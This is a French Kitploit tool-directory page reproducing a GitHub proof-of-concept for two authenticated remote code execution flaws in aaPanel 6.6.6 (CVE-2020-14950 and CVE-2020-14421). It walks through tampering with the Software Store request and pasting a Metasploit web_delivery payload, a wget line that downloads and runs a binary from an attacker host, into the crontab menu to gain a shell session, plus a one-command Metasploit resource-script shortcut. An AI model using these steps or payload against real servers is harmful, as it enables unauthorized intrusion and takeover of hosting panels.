Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/jenaye/aapanel
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubjenaye/aapanel

aapanel

aapanel 6.6.6 - Exécution de code à distance (authentifiée)

Voir le dépôt
273il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

aapanel

aapanel 6.6.6 - CVE-2020-14950

  • Description : permet aux utilisateurs authentifiés à distance d'exécuter des commandes arbitraires via le menu de réglage du Software Store.
  • Versions affectées : Toutes <= 6.6.6

Informations

Pour réaliser cette preuve de concept, j'ai simplement installé le logiciel à l'aide de docker-compose.

  • Type de vulnérabilité : Exécution de commandes à distance (RCE authentifiée)

POC

Allez dans Software Store, cliquez sur n'importe quelle ligne du champ des paramètres, interceptez la requête lorsque vous cliquez sur "start/stop/restart" et modifiez/éditez la requête afin d'exécuter ce que vous voulez. Voici un exemple avec curl :

receStore receStore

aapanel 6.6.6 - CVE-2020-14421

  • Description : permet à un attaquant d'exécuter une commande arbitraire à distance
  • Versions affectées : Toutes <= 6.6.6

Informations

Pour réaliser cette preuve de concept, j'ai installé une Ubuntu 20.04 fraîche, puis j'ai installé + et exécuté ce script

Télécharger l’outil
wget
sudo
wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh
  • Type de vulnérabilité : Exécution de commandes à distance (RCE authentifiée)

POC

Tout d'abord, configurez les options de web_delivery ; cela créera un payload et un listener.

web_delivery

Maintenant, lancez-le.

run

cela générera le payload suivant :

wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown

Ensuite, copiez/collez-le comme ceci dans le script content du menu crontab d'aapanel.

cron

Maintenant, exécutez simplement votre crontab et attendez votre session.

command

Exploitation rapide

Exécutez simplement msfconsole -r aapanel.rc, copiez/collez le payload dans la section script content, et profitez de votre session.